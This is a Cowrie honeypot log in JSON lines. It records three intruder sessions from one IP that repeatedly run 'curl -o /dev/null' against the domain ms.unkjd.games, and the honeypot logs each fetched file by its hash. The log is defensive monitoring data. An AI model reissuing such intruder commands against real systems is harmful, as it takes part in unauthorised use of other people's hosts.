{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.896764Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.897708Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.898523Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.918585Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.919122Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.924119Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.925827Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.932099Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.932707Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.934378Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.935040Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.960613Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.961322Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.965657Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.967525Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:35.968308Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:35.968798Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.025231Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.025993Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.030319Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.030969Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.036258Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.038075Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.040731Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.041239Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.066240Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.067482Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.068007Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.070384Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.071144Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.073665Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.075551Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.100282Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.102086Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.104251Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.105180Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.105805Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.108103Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.110992Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.112473Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.113185Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.149199Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.149732Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.151436Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.151992Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.153659Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.154036Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.158695Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.160592Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.188629Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.190218Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.192617Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.194033Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.194742Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.198272Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.201310Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.202585Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.203186Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.232544Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.233218Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.236848Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.239330Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.242189Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.243975Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.244805Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.246456Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.247278Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.273074Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.273701Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.278001Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.280925Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.284020Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.284726Z","src_ip":"212.227.125.160","session":"26f25614e1ff"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.288230Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.289049Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.289491Z","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T09:00:36.312905Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ms.unkjd.games","message":"CMD: curl -o /dev/null https://ms.unkjd.games","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.313562Z","src_ip":"212.227.125.160","session":"9f264c568782"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.319139Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"8458ef53750b"}
{"eventid":"cowrie.session.file_download","url":"https://ms.unkjd.games","outfile":"var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","shasum":"880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","sensor":"my-vps","timestamp":"2025-08-31T09:00:36.321040Z","message":"Downloaded URL (https://ms.unkjd.games) with SHA-256 880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc to var/lib/cowrie/downloads/880c929020d4b79bf1995656d21d9a6859aab3a9460f941eb0b1a6e5502ee4cc","src_ip":"212.227.125.160","session":"26f25614e1ff"}
